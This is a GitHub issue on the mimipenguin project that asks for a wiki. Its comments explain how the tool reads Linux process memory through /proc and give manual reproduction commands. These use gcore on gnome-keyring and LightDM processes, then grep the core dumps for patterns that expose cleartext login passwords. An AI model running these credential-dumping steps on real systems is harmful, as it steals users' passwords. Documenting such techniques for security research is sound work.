Create a wiki
KINGSABRI opened this issue · 2 comments
Feature request
As this script getting more attentions, each plugin has its own way and could need some research, of course.
The idea is, we create a wiki for each feature to explain the main issue and how to reproduce it manually. So, people who try to add or use these feature they will have a good understanding to build the same script with another language and add more features for existing scripts.
Expected behavior
To have something like knowledge base that explains each plugin/feature (not code) of mimipenguin
Reproduce Steps
To dump Linux memory for a specific process to disk, we need the following:
Gdm
- Get process id (PID):
/proc/[PID]/cmdline
cmdline is file holds the complete command line for the process. - Get PID maps:
/proc/[PID]/maps
maps is file containing the currently mapped memory regions and their access permissions. - Get processes memory pages:
/proc/[PID]/mem
mem is a file can be used to access the pages of a process's memory through
search for ^.+libgck\-1\.so\.0$ in memory dump
+1
I noticed the wiki hasn't been created yet, so here's some notes for gnome-keyring and LightDM.
Note that the steps provided are simply to verify the issue and may differ slightly to the techniques used in mimipenguin.
gnome-keyring
- Original report and PoC by xivoct
Steps to reproduce:
# gcore $(pgrep gnome-keyring)
# strings core.* | grep -E '^.+libgck\-1\.so\.0$' -B 10 -A 10LightDM
- Original report and PoC by Sven Blumenstein
Steps to reproduce:
# gcore $(ps -eo pid,command | grep lightdm | grep session-child | awk -F ' ' '{ print $1 }')
# strings core.* | grep -E '^_pammodutil_getspnam_' -A1